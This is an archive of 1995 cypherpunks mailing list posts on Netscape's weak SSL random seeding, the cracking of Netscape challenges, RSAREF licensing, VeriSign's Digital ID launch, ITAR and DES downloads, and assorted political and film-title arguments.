From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Mon, 18 Sep 95 10:56:50 PDT
To: gnu@toad.com
Subject: Re:  Intellectual Property and Crypto collision
Message-ID: <9509181801.AA06230@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW
>> A presidential task force has recommended that electronic transmission of
>> books, magazine articles and software should be classified as copies
>> subject to existing copyright laws.   The task force also recommended that
>> it should be illegal to make or distribute products aimed at decoding
> encrypted software without the consent of the copyright owner. 
 
>Would this make it illegal to produce tools for decrypting key-escrowed
>software?   :-)


More importantly, would this firmly extend first amendment protection to 
electronicly transmitted forms?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 18 Sep 95 08:10:04 PDT
To: cypherpunks@toad.com
Subject: Good random seeds
Message-ID: <199509181510.LAA01802@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	Since we can all see how badly time works, I'd like to point out
that Will Price, author of the excellent Cryptdisk utility for the Mac,
uses mouse movements to seed his PRNG.

	His code is available for a small fee, and I'd strongly suggest
that people who need good, easy PRNs take a look at it, and also take a
long look at RFC1750, randomness reccomendations for security (or
something like that.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume


"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 18 Sep 95 11:23:52 PDT
To: norm@netcom.com (Norman Hardy)
Subject: Re: Netscape SSL implementation is broken!
In-Reply-To: <ac83454201021004a29a@DialupEudora>
Message-ID: <199509181823.LAA00950@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| At 9:29 PM 9/17/95, Perry E. Metzger wrote:
| >Christian Wettergren writes:
| >> I guess we should send them the draft-ietf-security-randomness-00.txt
| >> asap.
| >
| >I thought that was an RFC by now.
| >
| >Perry
| It is! RFC 1750.

I should have known, since it was a draft years ago. 
Ok, you Netscape people, go read RFC 1750! :-)

Btw, I guess my asadi program is full of holes and bugs.
Where is a decent 'randomness generator' for a SunOS system?

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 18 Sep 95 08:35:49 PDT
To: cypherpunks@toad.com
Subject: Re: Code of Law
In-Reply-To: <199509181425.HAA13003@infinity.c2.org>
Message-ID: <9509181534.AA10941@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Another
>court offered $1 million bounties for the arrest of local
>officials and threatened to hang them. Garfield County
>Attorney Nick Murnion charged some members of the Common
>Law court with "criminal syndicalism," alleging that the
>group had advocated acts of violence for political
>purposes. One court member was sentenced to 10 years in
>prison. Others received smaller sentences.

This sort of thing can become very dangerous very quickly. In the
UK there was a publicity seeking shyster who decided to make a
political career out of attacking a book he didn't like. The
authorities didn't want to risk getting involved so they let the
guy go round calling for the author to be murdered. He has been in
hiding since the Ayatoloah issued a death threat.


>"The basic idea behind the movement," says
>University of Oregon history professor Richard Brown, "is
>'popular sovereignty,' that people are above the law.
>These people are alienated from the legal system. To some
>extent it sounds like they're also trying to settle
>personal scores."

Sounds like they don't like the democracy so they are setting
up their own lynch law. It dosen't sound all that different from
fascism. First they start saying that a group of people are evil, 
once they have convinced each other that this is the case they take
the logical next step of murdering them.


Another reason why we need cryptography, to protect ourseles against 
such self appointed lynch mobs.


		Phill H-B





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 18 Sep 95 11:37:55 PDT
To: hallam@w3.org
Subject: Re: Code of Law
In-Reply-To: <9509181534.AA10941@zorch.w3.org>
Message-ID: <199509181837.LAA01709@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| >"The basic idea behind the movement," says
| >University of Oregon history professor Richard Brown, "is
| >'popular sovereignty,' that people are above the law.
| >These people are alienated from the legal system. To some
| >extent it sounds like they're also trying to settle
| >personal scores."

I suddenly got very cold.

I thinnk the world has seen enough of 'revolutionary justice',
both in the Soviet Union; there are some fascinating passages
of Lenin about avoiding the bourgouise invented 'justice' concept, 
and that the revolution was well 'above' that whole thing,

and im Germany.

And I guess in current China.

When the people and the govering establishement has lost contact
this much, you're in for trouble.

(Ok, remember I'm a dumb Swede, that still happens to believe that
State and People doesn't have to be enemies. And I do believe in a
sensible dialog between different interest groups etc etc. Flame
away, I'm just dumb anyway. ;-))

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@eskimo.com>
Date: Mon, 18 Sep 95 12:11:50 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509181245.A28856-0100000@echonyc>
Message-ID: <Pine.SUN.3.91.950918120303.24314B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Steven Levy wrote:

> It's my impression that the play was staged a few years after my book 
> came out in 1984 (though I chose the title in 1982). I remember reading 
> the reviews then, and they didn't 
> seem to mention that it was a revivial of a years-old play whose name I had 
> unintentially used for my own book. (Unlike the case for the current 
> movie, whose screenwriter seemed to know of my own book.)  If 
> you have evidence that the play was indeed produced before 1984, please 
> let me know.  Otherwise, I'd be happy to accept your apology, Peter.

  Guys, I think this has gotten a little silly. Trying to claim that 
anyone 'stole' a single word title is equivalent to Microsoft trying to 
tell other OS makers that they can't call their graphical frame things 
'windows' because they thought of it first.

  The word 'Hackers' is a description of a group of people. It means 
different things to different folks (personally I like the 
definition/descriptions in Stephen's book) but since it is so widely used 
I don't see how anyone can claim to have had it stolen from them.

  Just as a side note, Stephen's book 'Hackers' had a substantial 
influence on me when I read it, and it holds a honored place among my 
collections of books.

  Brian
------------------------------------------------------------------------------
 ftp.eskimo.com/blane     |                       |     www.eskimo.com/~blane
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Sep 95 09:23:10 PDT
To: cypherpunks@toad.com
Subject: Netscape's random numbers
Message-ID: <9509181622.AA15284@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Congrats, nice job!

The Netscape license explicitly prohibits decompiling (except where such
prohibition is illegal).  When this hits the media it will be important
to avoid being tarred with the "hacker breaks rules and breaks in" brush.
More subtly, it's probably a bad idea to call into question the overall
business model of client binaries on the net.

Instead, emphasize importance of open code, public reviews, ability to
link in your own code that meets public specs, etc.  All of these things
the Internet was designed to do, and U.S. ITAR regulations are designed
to prohibit (globally, anyway).  And also that the bad guys will never
play by the rules.  And re-emphasize that solutions are possible, just
that the U.S. government prevents them from being deployed in a global
economy.

Perhaps draw parallels to the recent Microsoft Word virus.

	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Mon, 18 Sep 95 09:29:15 PDT
To: Peter Trei <trei@process.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <199509181408.KAA02406@echonyc.com>
Message-ID: <Pine.3.89.9509181245.A28856-0100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain


It's my impression that the play was staged a few years after my book 
came out in 1984 (though I chose the title in 1982). I remember reading 
the reviews then, and they didn't 
seem to mention that it was a revivial of a years-old play whose name I had 
unintentially used for my own book. (Unlike the case for the current 
movie, whose screenwriter seemed to know of my own book.)  If 
you have evidence that the play was indeed produced before 1984, please 
let me know.  Otherwise, I'd be happy to accept your apology, Peter.

On Mon, 18 Sep 1995, Peter Trei wrote:

> 
> > >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> > >is curiosity." 
> 
> > It may not be a crime, but it's not nice to steal a title.
> 
> You mean, like you stole it from Dale Luck's (duck@mit oz) stage play of the same name?
> I saw this (in an Off-Off-Broadway production), years before your book came
> out.
> 
> 
> 
> 
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team                                
> Process Software Corporation
> http://www.process.com
> trei@process.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Mon, 18 Sep 95 09:29:26 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <D7TmBD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:

> 
> >Should there be an "alt.cypherpunks" type of newsgroup instead of this
> >mailing list?
> 
> Bad idea, it would simply mean that every kook on USEnet would add 
> alt.cypherpunks onto the crossposting line. We would have black helicopters, 
> loons, Waco Wako's, Loonytarians and turkish government propaganda spamming 
> forever.

Hey, create the alt. group and let it draw the kooks. Nobody said WE have to
read it. We can stay here as usual...


--
                        WebCasters(tm)
James C. Grubs                         jgrubs@left.webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Mon, 18 Sep 95 09:28:13 PDT
To: cypherpunks@toad.com
Subject: Re: Joe Sixpack and his TV
Message-ID: <v02120d00ac830d476a45@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:20 PM 9/17/95, Black Unicorn wrote:

>As I understand it shows like "The X-Files" don't accept unsolicited
>scripts.  Not surprising as I'm sure they have writer's agreements.

And, given how popular the show is, I doubt their *writers* even accept
unsolicited *phone calls*. In principle, the idea of working on positive
media exposure is a good one; in practice, it'll likely be mostly
dangerous, since there's no way to guarantee a pro-crypto slant when
anticrypto slants will widely be seen as making for better "drama."
        Any number of soap writers would bite a crypto hook if someone took
the time to contact them--except on shows like that secrets are *bad*
(e.g., So-and-so is suspected of Murdering Whoever for Financial Reasons,
but refuses to give up the Password to his Encrypted Files, so Some Chick
Seduces him and slips an Invisible Keystroke Capture Program, written by
her Little Hacker Brother, onto his computer to Reveal the Ugly Truth). The
news programs won't be much better, since reporters, being a suspicious
lot, tend to dislike secrets too.
        Maybe try the Simpsons, hey? I see it all now: Bart encrypts Homer
and forgets the password. As far as the family's concerned, the blob of
random friction that sits around watching TV and drinking beer is fine, but
Homer's boss starts to worry that Home's looking a bit unkempt...


ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Mon, 18 Sep 95 10:32:48 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape's random numbers
Message-ID: <v01510100ac836b357d90@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Congrats, nice job!

Yes, well done.

>The Netscape license explicitly prohibits decompiling (except where such
>prohibition is illegal).  When this hits the media it will be important
>to avoid being tarred with the "hacker breaks rules and breaks in" brush.
>More subtly, it's probably a bad idea to call into question the overall
>business model of client binaries on the net.
>
>Instead, emphasize importance of open code, public reviews, ability to
>link in your own code that meets public specs, etc.  All of these things
>the Internet was designed to do, and U.S. ITAR regulations are designed
>to prohibit (globally, anyway).  And also that the bad guys will never
>play by the rules.  And re-emphasize that solutions are possible, just
>that the U.S. government prevents them from being deployed in a global
>economy.

Before we go to the news, perhaps we should demonstrate the exploitation of
this hole. It would certainly make selling this story a whole lot easier.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMF27PHIf3YegbdiBAQGI7AJXY5d2Su52MWXrh6tP20vOai/Rsbd6+oqx
urWUP34wPv5dqMv1Mw6XDlstX5Q3KmOMeTOjAwcjuJXY5Z3RhkL0gi0nMBUS/IdZ
b/GN
=vhHo
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 18 Sep 95 09:47:11 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <199509181421.KAA01808@panix.com>
Message-ID: <Pine.SUN.3.91.950918124125.1825D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Duncan Frissell wrote:

> At 08:33 AM 9/15/95 -0700, Charles Lewton wrote:
> 
> >Not quite squashed, Duncan.  Bullet placement (poor by some standards)
> >is all that prevented Mr. Weaver from croaking like his unfortunate wife.
> >She is said to have "pissed off" the feds but was not charged with a
> >single actionable item yet she remains quite dead.
> >
> >Unless I have missed something somewhere, no TLA is concerned in the slightest
> >with individual liberty.  That notion should keep a rational person awake
> >nights.
> >
> >Chuck
> >
> 
> In response to Chuck and Lucky, I can only say that the Weavers suffered 57%
> casualties (4/7) and 28% KIA (2/7).  The Feds suffered .25% KIA (1/400).  I
> don't think any Feds were merely wounded.
> 
> They brought murder charges against two members of the group and lost.

Careful here, they lost because the FBI refused to cooperate with the 
prosecutor.  It was looking like a open and shut case before this.

>  They settled wrongful death suits for $3.1 million.  They also lost 
> the publicity war.  They had to change their procedures because of Ruby 
> Ridge and Waco.

Actually, they just reenforced the old policy, which had been degrading 
in practice for quite a long while in the case of Ruby Ridge.

> They energized the opposition.
> 
> The casualties were unfortunate but when facing force ratios of 57/1 or
> better, the outcome has to be considered a major victory for Randy Weaver.

Considering the limited rules of engagement (i.e. low intensity sniper 
conflict only) I don't think you can really take 57/1 as a force ratio of 
meaningful impact.

> The case is a demonstration of modern conflicts in which litigation and
> publicity count as much as guns.  On that field, the Feds don't hold all the
> cards.

On this I agree with you.

> 
> DCF
> 
> "The libertarian and conservative coalition of the 'Right' is a
> low-maintenance coalition because its members mostly want to be left alone
> while the special interest group coalition of the 'Left' is a
> high-maintenance coalition because all of its members need to be given a
> vast dose of government cash daily."   
> 
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 09:51:36 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <Pine.SOL.3.91.950918185301.29263B-100000@orb>
Message-ID: <199509181651.MAA00479@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young writes:
> On 18 Sep 1995, Jeff Weinstein wrote:
> > The implementation guide recommends using rc2-cbc 40-bit for content
> > encryption when there is no way to determine the capabilities of the
> > recipient.  When you do know what the recipient can do, it recommends
> > using RC2-CBC with a longer key or DES-CBC.
> 
> Hmm....  notice the use of a non public cipher as the base cipher.... 
> what a shame.... 

Its also a shame that they aren't sticking to MOSS, which is the open
IETF standard for such stuff.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 18 Sep 95 10:00:05 PDT
To: <trei@process.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509181659.AA22457@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> It's my impression that the play was staged a few years after my book 
> came out in 1984 (though I chose the title in 1982). I remember reading 
> the reviews then, and they didn't 
> seem to mention that it was a revivial of a years-old play whose name I had 
> unintentially used for my own book. (Unlike the case for the current 
> movie, whose screenwriter seemed to know of my own book.)  If 
> you have evidence that the play was indeed produced before 1984, please 
> let me know.  Otherwise, I'd be happy to accept your apology, Peter.
> 
> On Mon, 18 Sep 1995, Peter Trei wrote:
> > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> > > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> > > >is curiosity." 
> > > It may not be a crime, but it's not nice to steal a title.
> > You mean, like you stole it from Dale Luck's (duck@mit oz) stage play of the same name?
> > I saw this (in an Off-Off-Broadway production), years before your book came
> > out.

If I'm wrong (and I would not be suprised  - I'm relying on fuzzy
memories here), please consider my abject apology tendered.

Namespace collisions seem to happen quite frequently in titles. I can 
remember when TMC made a big deal out their intention to air
'Brainstorm", the 1983 film with Natalie Wood. I settled down to
watch, and up came a black and white movie with a totally different
plot - it turned out they had been sent the 1965 film of that name,
and no one had checked. Looking in the (ex)Cardiff film database, I
note that there is now a 3rd movie of the title (1994).

A couple weeks ago my daughter was making a big deal about 
wanting to watch 'The Red Shoes" on Disney. I was thinking of
the 1948 ballet movie, and told her I didn't think she'd like it. She
insisted, and it turned out to be a 30 minute (and charming in
cloying sort of way) cartoon.







Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 13:11:24 PDT
To: cypherpunks@toad.com
Subject: information on SSL brute force hacks wanted
Message-ID: <199509182005.NAA08898@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I'm putting together the hack netscape promotion (I still
need to find someone to design the t-shirt) and need to know some
information.

1) Who wrote the sslbrute software package and keyserver? Who managed
the distributed cracking event?

2) Who broke Hal's first challenge?

	Please send me names email addresses and URLs.

	If you know of other people who you think deserve recognition
for hacking netscape products, contact me.

	To see the page while under construction look at
http://www.c2.org/hacknetscape -- please don't link to it, as it is
obviously under construction.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Sep 95 10:12:30 PDT
To: cypherpunks@toad.com
Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
Message-ID: <9509181711.AA15476@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



This seems to be
  /* Sofware DES functions
   * written 12 Dec 1986 by Phil Karn, KA9Q; large sections adapted from
   * the 1977 public-domain program by Jim Gillogly
   * Modified for additional speed - 6 December 1988 Phil Karn
   * Modified for parameterized key schedules - Jan 1991 Phil Karn

Would someone from outside the US try to download the above file?
It would be, at least, amusing if an Air Force site were in violation
of the ITAR (their README notwithstanding).
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 18 Sep 95 13:07:16 PDT
To: cypherpunks@toad.com
Subject: RSAREF Commercial Licensing
Message-ID: <v02130501ac838ffc6fe8@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


Well I've vaccilated between making a formal, dry announcement or
letting you all know my way. Given the general tenor (and individual
spirit) of many on Toad it is pretty easy to guess which path I chose.

So, first of all, here is to a productive future for encryption and
encryption technologies. Consensus Development and RSA Data Security,
have finalized the contract for Consensus to license and support
RSAREF(tm) for commercial use.

This isn't an advertisement for RSAREF -- as we are seeking to first
present our license to those who have already expressed interest in
the product to 'beta-test' our standard agreement. Meanwhile, we would
like to gather some information from the net community.

Our foremost concern is for those who have been using RSAREF in
the past. If you have discovered any bugs which have either gone
unreported or unfixed, we need to know ASAP. No bugs have been
officially reported in version 2.0, however we have heard in the
past that some may have been found. If a report has gotten lost
during this period of transition, we'd like to know. Consensus'
first priority is to make sure RSAREF is bug free.

Secondly, for those who have contributed code to RSAREF in the
past, or have code they'd like to submit, send email to me at the
address below. Our hope is that RSAREF will continue to improve
and meet the needs of its users through the co-support of both
Consensus Development and our commercial and non-commercial
RSAREF developers.

Lastly, we would like to hear suggestions and ideas on how to
improve RSAREF. We intend to remain responsive to requests, and
welcome ideas for the evolution of the RSAREF toolkit.

Anyway, again, have a good day. For those who would like to be
on our RSAREF announcement list, send mail to
<RSAREF-Ann-L@consensus.com> with 'Subscribe' in the Subject
header.

Note: RSAREF is a trademarked term by RSA Data Security

Thank you all for your patience, I'm sure many will be as excited
as I am.

Jonathan Zamick
Knowledge Officer

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@telecheck.com
Date: Mon, 18 Sep 95 12:29:14 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: (noise) Re: SPAM bait
In-Reply-To: <199509161913.PAA55049@tequesta.gate.net>
Message-ID: <9509181927.AA18728@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> nobody@alpha.c2.org (Anonymous) wrote: 
> <snip>
> >
> >Don't worry, "Janet Dove", or actually sanghi3@grfn.org got mailbombed
> >severely for this one.  I'm just glad he doesn't know how to use remailers.
> 
> Good going, Anonymous. What I don't understand about inappropriate
> SPAMs like that one (or telephone ads) is; what's the business
> incentive to do it? I assume that no Cypherpunk has subscribed to
 <snip>
> JMR
> 

I'm no lawyer (and probably wouldn't admit to it if I was.. ;) ) but
in most states there are laws restricting advertisement wherein the
target of the advertising does not have to pay for the privledge of
being advertised to.  I beleive this came about right after FAX machines
started taking off, and people were sending out advertisments wasting
fax paper and jamming telephone lines.

Can't this be applied to the internet?  I believe someone sued Visa
when he was forced to receive junk e-mail on CompuServe (I think he
even won.) Anyone have any info on this?

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Mon, 18 Sep 95 15:14:59 PDT
To: cypherpunks@toad.com
Subject: VeriSign Introduces the First Digital ID Issuing Service
Message-ID: <9509181742.aa29912@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I thought the folloing would in interesting.  It looks similar to what SLED
whanted to do.  Would be interested to see what their method of verification is.

- -------------
[Begin forwarded message ]

VeriSign Introduces the First Online Digital ID Issuing Service; Users
Get Unique Digital IDs to meet the Security Needs of Commerce and
Communications

REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 18, 1995--VeriSign today
announced the World Wide Web's first Online Digital ID Issuing Service.
Being released in conjunction with Netscape Navigator 2.0, this service
will allow users to directly enroll and receive their own unique Digital
IDs. VeriSign defined today the class structure of its Digital ID brand
of public identification certificates, establishing four classes of
identification to meet the varying security needs within different
environments.

The service will begin Beta testing in late October. A company or a
consumer will be able to get a unique Digital ID online through
VeriSign's Online Digital ID Issuing Service located on the World Wide
Web. A user can register for a non-commercial Class One Digital ID at no
cost, or a commercial version for $6, through an online autoresponder.
This unique Class One Digital ID is designed for casual World Wide Web
browsing and secure e-mail and is used by Netscape Navigator 2.0 to
allow users to communicate securely and identify themselves to other
users, as well as merchants on the Internet.

"The Online digital ID Issuing Service was created to provide a one-step
process for obtaining a Digital ID for our corporate and individual
users," said Stratton Sclavos, President and CEO of VeriSign, Inc. "We
are offering non-commercial users Class One Digital IDs at no cost to
introduce the concepts of authentication and privacy to the market. We
will also offer higher classes online using higher assurance policies.
We believe Digital IDs will help everyone in the online community safely
conduct their business or personal transactions over public and private
networks."

Public identification certificates


Working closely with application developers, service providers and
affiliates, VeriSign issues and manages multiple classes of Digital IDs
supporting a wide range of public identification certificate-enabled
products like Netscape Navigator 2.0. VeriSign's public identification
certificates can be issued for individuals as well as entities such as
merchant servers. These public identification certificates, categorized
into four classes with escalating levels of identity assurance, can be
obtained from VeriSign directly or through the Online Digital ID Issuing
Service.

Class One Digital IDs: These IDs insure the uniqueness of a name or
e-mail address. Class One Digital IDs are primarily used for casual
World Wide Web browsing and secure e-mail. VeriSign offers
non-commercial Class One Digital IDs at no cost or VeriSign supported
commercial versions for $6.

Class Two Digital IDs: These IDs provide a higher level of assurance
regarding a person's identity by involving third-party proof of name,
address and other personal information provided in the registration
process. Class Two Digital IDs are primarily used for inter-company
e-mail, online purchasing from electronic malls and online
subscriptions.

Class Three Digital IDs: These IDs further raise the level of identity
assurance by involving personal presence or registered credentials.
Class Three Digital IDs are used primarily for transactions demanding a
higher level of assurance of the identity of an individual. Typical
applications include electronic banking, large-sum purchases from
electronic malls and membership-based online services. VeriSign
additionally offers Class Three Digital IDs for electronic commerce
servers such as Netscape's Commerce Server and Open Market's Secure
WebServer.

Class Four Digital IDs: These IDs are for individuals and companies
requiring a maximum level of identity assurance. To obtain these IDs,
the individual and/or organizations they represent is more thoroughly
investigated and personal presence is required. Typical applications
include access to confidential information, authorization to trade
financial securities, and access to corporate databases.

VeriSign is the only company 100% committed to the digital
authentication market. Home banking, electronic payments, and
subscription based services are some of the areas in which VeriSign is
working, with clients that include NASA, TRW, Netscape and Apple.
VeriSign's public identification certificates offer multiple levels of
identity assurance. In addition, VeriSign is extending its certificate
issuing technology to include new X.509 version 3 format, which greatly
expands the flexibility and capability of Digital IDs. Navigator 2.0
users will be the first customers to receive version 3 compatible
Digital IDs. Being X.509 compliant, VeriSign can include authorization
parameters in a Digital ID allowing both corporate and individual users
to customize them according to their electronic commerce and
communications needs. X.509 certificates are becoming the
internationally recognized standard form of "I.D." on public and private
networks.

Pricing and Availability


Netscape Navigator 2.0 users will be able to download Class One Digital
IDs from VeriSign's new Online Digital ID Issuing Service on the World
Wide Web beginning in late October. Non-commercial Class One Digital IDs
will be offered at no cost, or if users desire a VeriSign supported
commercial version, the cost is $6 annually. Class Two Digital IDs are
available for $12 annually. Class Three Digital IDs are available for an
individual for $24 annually. Corporate site license discounts are
available. Class Three Digital IDs for an entity such as a corporate
server are available for $290 for the first Digital ID and $95 for
additional IDs at the same site annually. To obtain pricing on Class
Four Digital IDs users should contact VeriSign directly.

VeriSign, Inc.


VeriSign provides Digital ID products and services for the electronic
commerce marketplace. VeriSign's Digital IDs play a key role in ensuring
the privacy and authentication of electronic transactions and
communications. VeriSign, founded in 1995 as a spin-off of RSA Data
Security, is working with its investors including Ameritech and Visa
International, and partners such as Netscape and Apple, to open the
digital marketplace to all consumers. VeriSign's goal is to provide
consumers with the confidence necessary to conduct electronic commerce
worldwide. For more information, contact VeriSign at 415-508-1151, or
visit their Web sit at http://www.verisign.com.

Note to Editors: Copyright 1995 VeriSign, Inc. 100 Marine Parkway,
Redwood City, CA 94065. All rights reserved. VeriSign is a service mark
and trademark of VeriSign, Inc. Digital ID, Providing Driver License for
the Information Superhighway and Certificate Issuing System are all
trademarks of VeriSign, Inc. All other trademarks are properties of
their respective owners.

CONTACT: VeriSign Inc.
Web Augustine, 415/508-1151
web@verisign.com
or
Niehaus Ryan Haller Public Relations
Marcos Sanchez, 415/615-7912
marcos@nrh.com
07:35 ET SEP 18, 1995



-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMF3nBFzvpSsKhLftAQHBSQP+PCmXw9P2EWjweTIWoT65BYKgmhnxZbx0
Ig0Zi7dVgFS+dIAxTnc23p4BBBapfZMrN2Ho/zhm7csPB4+XQ65y+vDVlDH8ehvA
d/b7gAtsE9tOe1YglNeeNaxba/xB2OuGN6XJHH2A8wojIPw7ALK66XMPJ6YGn24T
N7eychxo61A=
=xgjH
-----END PGP SIGNATURE-----
                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 18 Sep 95 06:01:10 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <9509181245.AA02101@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> Bad idea, it would simply mean that every kook on USEnet would add 
> alt.cypherpunks onto the crossposting line. We would have black helicopters, gun 
> loons, Waco Wako's, Loonytarians and turkish government propaganda spamming 
> forever.

And  cancel-messages from Co$ ...


Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 18 Sep 95 12:25:17 PDT
To: jim@acm.org
Subject: Re: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <199509181748.KAA17616@mycroft.rand.org>
Message-ID: <199509181924.PAA09406@bwface.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I would expect that as the folks responsible for the FTP site,
you could drag the USAF into the lawsuit as a co-defendant, then get
the suit against you dropped because of the statue of limitations,
leaving the AG investigating the Air Force. :)

Adam

| > Would someone from outside the US try to download the above file?
| > It would be, at least, amusing if an Air Force site were in violation
| > of the ITAR (their README notwithstanding).
| 
| Hurm -- if Phil Karn and I knowingly allow it to remain there, that puts
| us in the same position as Phil Zimmermann, right?  Oh -- except that our
| offenses may already be beyond the statute of limitations.

-- 
"It is seldom that liberty of any kind is lost all at once."
